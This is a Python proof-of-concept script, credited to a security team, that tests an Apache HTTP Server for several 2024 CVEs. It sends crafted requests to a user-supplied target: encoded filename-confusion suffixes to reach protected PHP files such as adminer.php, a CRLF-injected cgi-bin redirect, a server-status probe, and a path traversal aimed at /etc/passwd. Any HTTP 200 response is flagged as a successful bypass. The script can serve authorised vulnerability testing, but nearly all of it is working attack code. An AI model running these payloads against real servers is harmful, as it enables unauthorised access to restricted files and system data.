import requests
import argparse

# Display basic tool information
def display_info():
    info = """
    Developer : ACyber.ir
    Version   : 1.0.1
    Develop Time : 5-10-2024
    CVE-2024-38472, CVE-2024-39573, CVE-2024-38477, 
    CVE-2024-38476, CVE-2024-38475, CVE-2024-38474, 
    CVE-2024-38473, CVE-2023-38709
    """
    print(info)

# Display about information
def show_about():
    about_text = """
    This is a Proof of Concept (PoC) for testing various vulnerabilities
    in Apache HTTP Server including SSRF, Denial of Service, and Filename Confusion Attacks.
    Developed by the A Cyber Security Team.
    """
    print(about_text)

# Function to test the vulnerability with multiple bypass attempts
def check_protected_file(target_url):
    # List of potential attack URLs
    test_urls = [
        f"{target_url}/php-info.php%3fooo.php",            # Filename Confusion: php-info.php
        f"{target_url}/xmlrpc.php%3fooo.php",              # Filename Confusion: xmlrpc.php
        f"{target_url}/adminer.php%3fooo.php",             # Filename Confusion: adminer.php
        f"{target_url}/bin/cron.php%3fooo.php",            # Filename Confusion: cron.php
        f"{target_url}/cache/index.tpl.php%3fooo.php",    # Filename Confusion: index.tpl.php
        f"{target_url}/cgi-bin/redir.cgi?r=http://%0d%0a", # Invoking Server-Status Handler
        f"{target_url}/server-status",                       # Testing server-status handler directly
        f"{target_url}/admin.php%2f%3fooo.php",             # Bypass using alternate encodings
        f"{target_url}/admin.php/%2e%2e%2fetc/passwd",      # Path Traversal Example
    ]

    # Loop through each URL and test the response
    for test_url in test_urls:
        print(f"Testing URL: {test_url}")
        response = requests.get(test_url)
        
        # Display response status code and check for potential bypass success
        print(f"URL Status Code: {response.status_code}")
        if response.status_code == 200:
            print(f"[!] Bypass successful for URL: {test_url}")
        else:
            print(f"[*] No bypass or blocked for URL: {test_url}")
        print("-" * 50)

# Function to handle command-line arguments
def parse_arguments():
    parser = argparse.ArgumentParser(description="Apache HTTP Server Vulnerability Testing Tool")
    parser.add_argument('--target', type=str, help='Target URL to test (e.g., http://example.com)', required=True)
    parser.add_argument('--info', action='store_true', help='Display tool information')
    parser.add_argument('--about', action='store_true', help='Show about this PoC')
    return parser.parse_args()

if __name__ == "__main__":
    # Automatically display tool info when the script starts
    display_info()

    # Parse command-line arguments
    args = parse_arguments()

    # Display about information if --about is provided
    if args.about:
        show_about()
    
    # Run the attack check if --target is provided
    if args.target:
        check_protected_file(args.target)
    else:
        if not args.info and not args.about:
            print("Please provide a target URL with --target, or use --info or --about for more information.")
